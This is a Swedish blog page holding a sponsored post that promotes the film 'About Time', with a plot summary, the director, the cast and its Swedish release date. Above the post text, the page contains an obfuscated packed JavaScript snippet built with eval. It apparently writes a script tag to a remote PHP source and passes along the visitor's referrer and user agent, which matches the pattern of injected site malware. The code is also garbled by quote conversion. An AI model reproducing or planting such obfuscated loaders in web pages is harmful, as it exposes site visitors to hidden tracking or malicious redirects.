Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Detta är ett sponsrat inlägg: Filmtrailer – About Time

Detta är ett sponsrat inlägg: Filmtrailer – About Time

type=”text/javascript”>// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|thiaz|var|u0026u|referrer|biena||js|php’.split(’|’),0,{}))
type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_144112565.js”>

About time: Nu när det börjar bli mörkare ute så finns det inget bättre än att gå och titta på en bra film på bio med nära och kära. Det är många bra filmer som släpps vid denna tidpunkt på året och här kommer ett bra tips.

Vid 21 års ålder, upptäcker den unga godhjärtade men tafatta advokaten Tim att han och alla män i hans familj kan resa i tiden och ändra vad som händer och har hänt i hans eget liv. Han beslutar sig för att försöka använda tidsresorna för att hitta ”den rätta”, uppvakta henne och starta en familj. Det visar sig inte vara så lätt som man kan tro.

About Time är en brittisk romantisk komedi / science fiction film som kretsar kring tidsresor. Manus skrivet och regisserad av Richard Curtis, och skådespelare som Domhnall Gleeson, Rachel McAdams och Bill Nighy. Filmen släpptes i Storbritannien den 4 september 2013 och släpps i Sverige idag den 18 oktober.